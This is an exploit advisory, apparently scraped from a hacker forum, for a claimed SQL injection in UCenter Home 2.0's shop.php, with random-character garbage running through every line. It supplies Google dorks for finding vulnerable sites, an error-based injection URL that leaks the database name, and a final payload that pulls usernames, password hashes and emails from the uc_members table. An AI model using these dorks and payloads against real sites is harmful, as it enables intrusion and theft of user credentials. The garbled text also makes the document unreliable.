. Z! E D+ I1 E* W" t) ~. z, S$ p) X
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
) p( s$ c2 L8 V! w6 a" S X+ R7 O( Z) z. @* v X
4 Y. `7 w% T3 b4 B9 Z
; K. c) Y/ }4 l8 g*/ Author : KnocKout ! X% [# E4 V2 F- i* ]& ]
% o# |! ^6 `# e% C- C4 u4 A( x
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers , G7 [1 k" r: D( l
( m# S1 l9 Z, I: d$ q*/ Contact: knockoutr@msn.com
# j$ d6 ~& J: c6 N* l
+ `& o4 v; }) E3 P*/ Cyber-Warrior.org/CWKnocKout & f. F/ C, v8 k$ Q
) s1 s& f1 r% M* a7 o__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
4 b/ H' E# j6 d! n6 w+ I0 q' ~/ F: K4 X4 K# B
Script : UCenter Home
7 I" H R" \3 t" v8 j' c, R
F |' D+ ^( g. d) \Version : 2.0
+ e8 Z$ z" i/ E) z% x
' r; m+ A5 P+ [4 DScript HomePage : http://u.discuz.net/
; B1 r+ Z- X* W" f* k. Z/ [/ D, s+ o1 c. p5 G1 p% q8 p8 ~- [
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== % b( q1 K2 n3 _/ k0 E* Z% ?
# Z7 f3 X1 g6 d* h! gDork : Powered by UCenter inurl:shop.php?ac=view 6 Z2 j" m' c! \) Y
4 C( I7 d# C$ `/ iDork 2 : inurl:shop.php?ac=view&shopid= , y0 D, t. n q# f5 D. p7 u, h3 G
3 @: p7 h# }2 h: V, a__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ( I5 ?4 U" R! g; {5 N! z
; X. R5 M( c2 K7 i) C% X( J
Vuln file : Shop.php 7 p! {+ C& H& |1 ~7 o/ V D
6 q# g: X0 a' Nvalue's : (?)ac=view&shopid=
+ Y. W+ L' V9 G$ n
6 H% N( O- j( t, Z% X, }Vulnerable Style : SQL Injection (MySQL Error Based) ]- x" v: c3 L$ a) `% @
/ Y* a3 [5 g! X
Need Metarials : Hex Conversion / m5 u3 H4 |' K0 ^3 a* W8 H2 V
$ s% O" ~7 U, k# T6 Q) L__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) ?! k$ A: R& X. s5 W. W
0 D$ r) V- ^, R, q0 p$ S3 L' y- sYour Need victim Database name.
4 a7 n% {" j0 P$ T$ r' [0 A) P" n& m+ l7 O% X8 M3 l1 ]
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
8 \$ i' Y' w# |# [3 B" }; `6 S `7 U# k& W# G* C. |
.. 7 A3 C0 s; F% r9 a* K' Y
* I7 Q2 k% {1 j& qDB : Okey. 9 d/ E& A0 o) `3 `2 Y
; S F. V7 I g# [your edit DB `[TARGET DB NAME]`
1 \/ z) f: v U0 k" O) ]1 Z; h9 [* f
Example : 'hiwir1_ucenter'
1 U" |, r1 t/ Y& p; @, i: \" ?" I* i5 ^! t( R3 ?
Edit : Okey. 1 y0 A I9 l" Q, b% J
' @$ _9 L5 d* N5 g5 _) wYour use Hex conversion. And edit Your SQL Injection Exploit.. 8 c. X C% `9 H8 D# q
; V. `' A g/ H% v" q$ B
/ x6 p K' z) k' M$ d! y# Q
/ q# k' a; i" q/ gExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- s2 m; N! K" w7 N; R" P% z9 a/ ] |